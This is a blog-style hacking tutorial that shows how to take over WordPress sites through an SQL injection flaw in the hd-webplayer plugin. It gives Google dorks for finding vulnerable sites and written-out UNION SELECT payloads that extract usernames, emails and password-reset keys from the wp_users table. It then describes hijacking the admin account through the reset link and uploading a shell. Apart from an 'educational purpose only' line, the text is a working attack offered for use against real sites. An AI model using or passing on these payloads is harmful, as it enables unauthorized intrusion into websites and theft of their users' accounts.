Hello Friends Chinmoy Here And Today I am Going To Tell You Hack WordPress Website Using SQL.
I have posted show many tutorials on web hacking and sql so today i am going post on WordPress...
____________________________
Title :- Hack WordPress Website Using SQL
Difficult Level :- Easy!
This Tutorial Is For Educational Purpose Only.
____________________________
Video Tutorial will upload soon.
1. Find an vulnerable page by Google dorks:
Google Dorks:
Dork I (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
Dork II(playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
Dork III (General):
inurl:"/wp-content/plugins/hd-webplayer/"
2. You will found many site vulnerable to this choose one of them and see is it working on it as most of them are not working due to security reasons.
You will find site address like this
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
Now check is this URL is vulnerable to SQLi by adding [ ' ] after URL and if the test disappear then it is vulnerable to SQLi and you may proceed
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3'
When you open the site you will see something like this :
|
Click On The Image To Make It Large.
3.We will not demonstrate SQLi here simply we want admin username and e-mail so will inject this code after URL find by you:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now if it works then you will find all username and e-mail of all the Users in the XML code above shown. Then go to Login page of the site and wordpress site login page usually is here
http://www.site.com/wp-login.php
Now enter the Username and click on "Lost your password" When the next page will open enter either Username or e-mail in the field like we entered an e-mail
Then it will show you that "check your e-mail for the conformation Link"
Now we need "activation key" So go again to this URL
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
and replace " UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users-- "
with " UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users-- "
Now you will get Username and activation key so we just go for reset it Go to : www.site.com/wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= & login= When new link will open For new password Enter the new password and all done you got access in the site Now You can Upload Your shell on site and edit the template of the site to see this step refer to video plz
ANY DOUBT FEEL FREE TO COMMENT..........
|
No comments:
Post a Comment